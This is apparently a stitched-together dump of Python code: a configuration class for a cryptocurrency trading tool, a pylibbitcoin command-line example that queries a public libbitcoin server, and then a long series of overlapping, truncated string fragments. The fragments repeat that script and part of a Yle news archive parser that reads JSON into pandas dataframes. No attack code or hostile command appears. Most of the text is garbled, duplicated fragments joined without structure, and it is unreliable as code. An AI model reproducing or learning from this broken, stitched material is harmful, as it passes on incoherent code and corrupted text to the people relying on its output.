# print(__name__)
logger = logging.getLogger(__name__)

section_names = ('fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex',
                 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor',
                 'customized_precisions')


class MyConfiguration():
    __config_dict = collections.defaultdict(dict)

    def __init__(self, *file_names):
        parser = ConfigParser()
        parser.optionxform = str  # make option names case sensitive
        for file_name in file_names:
            found = parser.read(file_name)
            raw_file_name = result = file_name.split('/')[-1]
            group = Util.slice_till_dot(raw_file_name)
            if not found:
                raise ValueError('No config file found!')
            for name in section_names:
                self.__config_dict[group].update(parser.items(name))

    def pretty_print(self):
        pprint(self.__config_dict)

    def get_config_base(self, state, key):
        try:
            result = self.__config_dict[state][key]
            logger.info("key={}, result={}".format(key, result))
            return result
        except KeyError:
            logger.error(KeyError)

    def get_config(self, key):
        return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key)

    def get_int_config(self, key):
        return int(self.get_config(key))

    def get_float_config(self, key):
        return float(self.get_config(key))

    def get_bool_config(self, key):
        return self.get_config(key) == 'true' or self.get_config(key) == 'True'

    def get_precisions(self, name, symbol):
        # bitfinex_ethusdt_amount
        metas = ['min_amount', 'price', 'amount']
        return_list = []
        for meta in metas:
            cfg_name = "{}_{}_{}".format(name.lower(), symbol.lower(), meta)
            try:
                ret = None
                if meta == 'min_amount':
                    ret = self.get_float_config(cfg_name)
                else:
                    ret = self.get_int_config(cfg_name)
            except Exception:
                logger.error("Cannot find %s precision: %s %s, using default"
                             % (meta, name.lower(), symbol.lower()))
            finally:
                return_list.append(ret)
        return return_list


cfg = MyConfiguration(os.path.join(os.path.dirname(__file__), '../config/dev.cfg'),
                      os.path.join(os.path.dirname(__file__), '../config/pro.cfg'))
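For concreteness, here is a rough sketch of how the precision lookup resolves, assuming `Constants.DQUANT_ENV` holds the name of the environment variable and that `dev.cfg` carries a `customized_precisions` section; the option names simply follow the `<exchange>_<symbol>_<meta>` pattern hinted at by the `bitfinex_ethusdt_amount` comment, and the state string matches the config file stem produced by `Util.slice_till_dot` (`dev.cfg` -> `"dev"`).

# Illustrative only: option names and values below are assumptions.
#
#   # dev.cfg (each section in section_names must exist in the file)
#   [customized_precisions]
#   bitfinex_ethusdt_min_amount = 0.04
#   bitfinex_ethusdt_price = 5
#   bitfinex_ethusdt_amount = 2
#
import os
from dquant.constants import Constants

os.environ[Constants.DQUANT_ENV] = "dev"  # select the "dev" group at lookup time

from dquant.config import cfg  # module-level singleton defined above

min_amount, price, amount = cfg.get_precisions("Bitfinex", "ETHUSDT")
# -> 0.04, 5, 2 under the config sketched above; a missing key comes back
# as None thanks to the try/except/finally in get_precisions().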
# pylibbitcoin command-line example
import asyncio
import sys
import binascii

import bitcoin.core

import pylibbitcoin.client


def block_header(client):
    index = sys.argv[2]
    return client.block_header(int(index))


def last_height(client):
    return client.last_height()


def block_height(client):
    hash = sys.argv[2]
    return client.block_height(hash)


def transaction(client):
    hash = sys.argv[2]
    return client.transaction(hash)


def transaction_index(client):
    hash = sys.argv[2]
    return client.transaction_index(hash)


def block_transaction_hashes(client):
    height = int(sys.argv[2])
    return client.block_transaction_hashes(height)


def spend(client):
    hash = sys.argv[2]
    index = int(sys.argv[3])
    return client.spend(hash, index)


async def subscribe_address(client):
    address = sys.argv[2]
    return await client.subscribe_address(address)


async def _read_from(queue):
    while True:
        print(await queue.get())


def unsubscribe_address(client):
    address = sys.argv[2]
    return client.unsubscribe_address(address)


def broadcast(client):
    # Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex  # noqa: E501
    # This might seem odd but this is a sanity check a client should probably do.  # noqa: E501
    block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2]))
    return client.broadcast(binascii.hexlify(block.serialize()))


async def history3(client):
    address = sys.argv[2]
    start_height = 10_000
    return await client.history3(address, start_height)


commands = {
    "last_height": last_height,
    "block_header": block_header,
    "block_height": block_height,
    "transaction": transaction,
    "transaction_index": transaction_index,
    "spend": spend,
    "subscribe_address": subscribe_address,
    "unsubscribe_address": unsubscribe_address,
    "broadcast": broadcast,
    "history3": history3,
    "block_transaction_hashes": block_transaction_hashes,
}


def main():
    if len(sys.argv) < 2:
        sys.exit("Usage: %s last_height|block_header|<cmd>" % sys.argv[0])
    command = sys.argv[1]
    if command not in commands:
        sys.exit("Command can be %s" % str.join(", ", iter(commands)))

    # client = pylibbitcoin.client.Client("tcp://127.0.0.1:9999", settings=pylibbitcoin.client.ClientSettings(timeout=5))  # noqa: E501
    # client = pylibbitcoin.client.Client("tcp://mainnet.libbitcoin.net:9091")
    client = pylibbitcoin.client.Client(
        "mainnet.libbitcoin.net",
        {"query": 9091, "heartbeat": 9092, "block": 9093, "tx": 9094})

    loop = asyncio.get_event_loop()
    error_code, result = loop.run_until_complete(commands[sys.argv[1]](client))
    print("Error code: {}".format(error_code))
    print("Result: {}".format(result))
    if type(result) == asyncio.queues.Queue:
        loop.run_until_complete(_read_from(result))
    number_of_pending_responses = loop.run_until_complete(client.stop())
    print("Number of pending responses lost: {}".format(number_of_pending_responses))
    loop.close()


if __name__ == '__main__':
    main()
"def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab a raw",
"block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash",
"def main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command =",
"client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091,",
"% str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\")",
"return await client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height,",
"client.spend(hash, index) async def subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address) async def",
"int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index = int(sys.argv[3]) return client.spend(hash,",
"9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result))",
"= loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses",
"len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" % sys.argv[0]) command = sys.argv[1] if command",
"# noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address =",
"\"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv) < 2: sys.exit(\"Usage: %s last_height|block_header|<cmd>\" %",
"history3(client): address = sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands =",
"import asyncio import sys import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index",
"== asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close()",
"sys.exit(\"Command can be %s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5))",
"block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem odd but this",
"\"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\":",
"= sys.argv[2] return client.block_height(hash) def transaction(client): hash = sys.argv[2] return client.transaction(hash) def transaction_index(client):",
"unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): # Grab a raw block",
"= pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094})",
"odd but this is a sanity check a client should probably do. #",
"def last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client):",
"# This might seem odd but this is a sanity check a client",
"def history3(client): address = sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands",
"= sys.argv[2] return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client):",
"= pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\":",
"if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost:",
"start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\":",
"return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client): hash =",
"should probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def",
"def transaction(client): hash = sys.argv[2] return client.transaction(hash) def transaction_index(client): hash = sys.argv[2] return",
"def subscribe_address(client): address = sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue): while True:",
"_read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def",
"can be %s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) #",
"{}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of",
"loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close() if __name__ == '__main__': main()",
"broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, } def main(): if len(sys.argv) < 2: sys.exit(\"Usage:",
"{\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result",
"iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\",",
"is a sanity check a client should probably do. # noqa: E501 block",
"\"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\": history3, \"block_transaction_hashes\": block_transaction_hashes, }",
"\"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\":",
"\", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client =",
"block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client): address = sys.argv[2] start_height =",
"client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction,",
"import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index))",
"address = sys.argv[2] return await client.subscribe_address(address) async def _read_from(queue): while True: print(await queue.get())",
"error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue:",
"import bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client):",
"noqa: E501 # This might seem odd but this is a sanity check",
"client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop =",
"sys.argv[1] if command not in commands: sys.exit(\"Command can be %s\" % str.join(\", \",",
"a sanity check a client should probably do. # noqa: E501 block =",
"sys import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index = sys.argv[2] return",
"commands: sys.exit(\"Command can be %s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\",",
"while True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client):",
"settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client = pylibbitcoin.client.Client(\"tcp://mainnet.libbitcoin.net:9091\") client = pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\":",
"import pylibbitcoin.client def block_header(client): index = sys.argv[2] return client.block_header(int(index)) def last_height(client): return client.last_height()",
"probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return client.broadcast(binascii.hexlify(block.serialize())) async def history3(client):",
"= sys.argv[1] if command not in commands: sys.exit(\"Command can be %s\" % str.join(\",",
"return client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash)",
"asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) ==",
"result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code: {}\".format(error_code)) print(\"Result: {}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result))",
"asyncio import sys import binascii import bitcoin.core import pylibbitcoin.client def block_header(client): index =",
"def _read_from(queue): while True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address)",
"block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast,",
"check a client should probably do. # noqa: E501 block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2])) return",
"return client.transaction_index(hash) def block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash =",
"= { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\":",
"True: print(await queue.get()) def unsubscribe_address(client): address = sys.argv[2] return client.unsubscribe_address(address) def broadcast(client): #",
"block_height(client): hash = sys.argv[2] return client.block_height(hash) def transaction(client): hash = sys.argv[2] return client.transaction(hash)",
"await client.history3(address, start_height) commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\":",
"a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem odd",
"commands = { \"last_height\": last_height, \"block_header\": block_header, \"block_height\": block_height, \"transaction\": transaction, \"transaction_index\": transaction_index,",
"number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses)) loop.close() if __name__ ==",
"\"transaction\": transaction, \"transaction_index\": transaction_index, \"spend\": spend, \"subscribe_address\": subscribe_address, \"unsubscribe_address\": unsubscribe_address, \"broadcast\": broadcast, \"history3\":",
"client.block_header(int(index)) def last_height(client): return client.last_height() def block_height(client): hash = sys.argv[2] return client.block_height(hash) def",
"= sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands = { \"last_height\":",
"\"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client))",
"hash = sys.argv[2] index = int(sys.argv[3]) return client.spend(hash, index) async def subscribe_address(client): address",
"sys.argv[2] start_height = 10_000 return await client.history3(address, start_height) commands = { \"last_height\": last_height,",
"{}\".format(result)) if type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses",
"\"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code, result = loop.run_until_complete(commands[sys.argv[1]](client)) print(\"Error code:",
"be %s\" % str.join(\", \", iter(commands))) # client = pylibbitcoin.client.Client(\"tcp://127.0.0.1:9999\", settings=pylibbitcoin.client.ClientSettings(timeout=5)) # client",
"https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501 # This might seem odd but this is a",
"block_transaction_hashes(client): height = int(sys.argv[2]) return client.block_transaction_hashes(height) def spend(client): hash = sys.argv[2] index =",
"pylibbitcoin.client.Client(\"mainnet.libbitcoin.net\", {\"query\": 9091, \"heartbeat\": 9092, \"block\": 9093, \"tx\": 9094}) loop = asyncio.get_event_loop() error_code,",
"type(result) == asyncio.queues.Queue: loop.run_until_complete(_read_from(result)) number_of_pending_responses = loop.run_until_complete(client.stop()) print(\"Number of pending responses lost: {}\".format(number_of_pending_responses))",
"seem odd but this is a sanity check a client should probably do."
] |
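The dispatch table in main() means every supported query is just a no-argument call on the client that resolves to an (error_code, result) pair. A minimal sketch of driving the same client without the CLI wrapper, assuming only the pylibbitcoin.client calls the script above already uses (host and port mapping copied from it):

import asyncio

import pylibbitcoin.client

client = pylibbitcoin.client.Client(
    "mainnet.libbitcoin.net",
    {"query": 9091, "heartbeat": 9092, "block": 9093, "tx": 9094})

loop = asyncio.get_event_loop()
# Each query resolves to an (error_code, result) pair, as main() unpacks above.
error_code, height = loop.run_until_complete(client.last_height())
print("tip height:", error_code, height)
# stop() reports how many in-flight requests were dropped on shutdown.
pending = loop.run_until_complete(client.stop())
loop.close()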
[
"argparse import sys import json import re import os from markdown import markdown",
"but if there's no hurry then the text will be cleaner text =",
"text = \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] ==",
"\"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but",
"= clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata, 'text': text }",
"data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published':",
"# Parsed data dictionary parsed_data = { **metadata, 'text': text } df =",
"e: print(\"Error creating output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if",
"import re import os from markdown import markdown from bs4 import BeautifulSoup import",
"df files except Exception as e: print(\"Error creating output path!\") print(e) # Saving",
"\", fname) for article in data[\"data\"]: # Metadata metadata = { 'doc_id': counter,",
"'published', 'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname)",
"help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes') args =",
"pkl extension for df files except Exception as e: print(\"Error creating output path!\")",
"import os from markdown import markdown from bs4 import BeautifulSoup import ftfy import",
"% 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ ==",
"= \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down,",
"+= 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json",
"<reponame>kamalmemon/yle-news-reader<filename>yle_reader_to_dataframe.py import zipfile import argparse import sys import json import re import os",
"<NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja",
"fname in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published',",
"pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False)",
"text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows",
"in article[\"content\"]: # skip images etc. if paragraph[\"type\"] not in [\"text\", \"heading\"]: text",
"pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished",
"fname) for article in data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id':",
"columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data if not fname.endswith(\".json\"): print(\"Skipping",
"reading file, skipping \", fname) for article in data[\"data\"]: # Metadata metadata =",
"\"heading\"]: text = \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"]",
"clean_markdown(text) # Parsed data dictionary parsed_data = { **metadata, 'text': text } df",
"= df.append(parsed_data, ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath),",
"creating output path!\") print(e) # Saving dataframe as pickle df.to_pickle(output_fullpath) if counter %",
"Exception as e: print(\"Error creating output path!\") print(e) # Saving dataframe as pickle",
"zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job started..\") for fname in",
"cleaner text = fix_encoding(text) text = clean_markdown(text) # Parsed data dictionary parsed_data =",
"sys import json import re import os from markdown import markdown from bs4",
"y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive",
"slows down, but if there's no hurry then the text will be cleaner",
"if there's no hurry then the text will be cleaner text = fix_encoding(text)",
"ftfy.fix_text(text, uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html",
"# [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text =",
"data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as f:",
"json import re import os from markdown import markdown from bs4 import BeautifulSoup",
"file, skipping \", fname) for article in data[\"data\"]: # Metadata metadata = {",
"parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news archive reader -",
"0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser =",
"= markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile)",
"os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except Exception",
"news archive reader - parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile",
"data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output",
"uncurl_quotes=False) def clean_markdown(text): # [Keskisuomalaisen](http://www.ksml.fi/kiekko/uutiset/sopanen-palaa-pelicansiin-jyp-ei-hankkinut-uusia-pelaajia/641867) mukaan JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html =",
"in data[\"data\"]: # Metadata metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"],",
"with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file,",
"\"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\" and",
"df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data if",
"if paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\",",
"from bs4 import BeautifulSoup import ftfy import pandas as pd def fix_encoding(text): #",
"paragraph[\"type\"] == \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"])",
"dataframe as pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter,",
"} # Article content for paragraph in article[\"content\"]: # skip images etc. if",
"= \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}] if paragraph[\"type\"] == \"heading\"",
"= pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text']) # Reading json data if not",
"fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as f: try: data =",
"ignore_index=True) # Making output directory try: output_fullpath = os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath",
"fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files except",
"not in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text' = ['resource', {'id':",
"import argparse import sys import json import re import os from markdown import",
"bs4 import BeautifulSoup import ftfy import pandas as pd def fix_encoding(text): # MOT:",
"down, but if there's no hurry then the text will be cleaner text",
"in [\"text\", \"heading\"]: text = \"N/A\" continue # 'text' = ['resource', {'id': '6385775'}]",
"= zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames) counter = 0 print(\"Parsing job",
"# kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return text",
"# pkl extension for df files except Exception as e: print(\"Error creating output",
"downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\", help='output directory for parsed dataframes') args = argparser.parse_args()",
"json.decoder.JSONDecodeError: print(\"Error reading file, skipping \", fname) for article in data[\"data\"]: # Metadata",
"os.path.join(args.outputdir, fname) os.makedirs(os.path.dirname(output_fullpath), exist_ok=True) output_fullpath = os.path.splitext(output_fullpath)[0]+'.pkl' # pkl extension for df files",
"return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files = len(fnames)",
"file \", fname) continue with zip_.open(fname) as f: try: data = json.loads(f.read().decode(\"utf-8\")) except",
"import pandas as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text,",
"import sys import json import re import os from markdown import markdown from",
"as pd def fix_encoding(text): # MOT: <NAME>ikä\\r\\ntoimittaja <NAME>en\\r\\nensiläh. 24.1.2011 return ftfy.fix_text(text, uncurl_quotes=False) def",
"in fnames: counter += 1 df = pd.DataFrame( columns=['doc_id', 'yle_id', 'url', 'published', 'text'])",
"as f: try: data = json.loads(f.read().decode(\"utf-8\")) except json.decoder.JSONDecodeError: print(\"Error reading file, skipping \",",
"print(\"skipped paragraph element\", paragraph[\"text\"]) continue text = paragraph[\"text\"].strip() # slows down, but if",
"features=\"lxml\").findAll(text=True)) return text def main(args): zip_ = zipfile.ZipFile(args.zipfile) fnames = zip_.namelist() num_files =",
"len(fnames) counter = 0 print(\"Parsing job started..\") for fname in fnames: counter +=",
"article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } # Article content for paragraph in article[\"content\"]: # skip",
"files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser = argparse.ArgumentParser( description='Yle news",
"archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir', default=\"./data/parsed/\",",
"as pickle df.to_pickle(output_fullpath) if counter % 5 == 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files))",
"metadata = { 'doc_id': counter, 'yle_id': article[\"id\"], 'url': article[\"url\"][\"full\"], 'published': article[\"datePublished\"] } #",
"== 0: print(\"Parsed {x}/{y} files..\".format(x=counter, y=num_files)) print(\"Finished parsing.\") if __name__ == \"__main__\": argparser",
"parse archive data to Pandas dataframes') argparser.add_argument('--zipfile', default=\"./data/ylenews-fi-2011-2018-src.zip\", help='zipfile downloaded from kielipankki') argparser.add_argument('--outputdir',",
"== \"heading\" and isinstance(paragraph[\"text\"], list): text = \"N/A\" print(\"skipped paragraph element\", paragraph[\"text\"]) continue",
"JYP-hyökkääjä # kosketinsoittaja **Janne** toivoisi html = markdown(text) text = ''.join(BeautifulSoup(html, features=\"lxml\").findAll(text=True)) return",
"re import os from markdown import markdown from bs4 import BeautifulSoup import ftfy",
"json data if not fname.endswith(\".json\"): print(\"Skipping file \", fname) continue with zip_.open(fname) as",
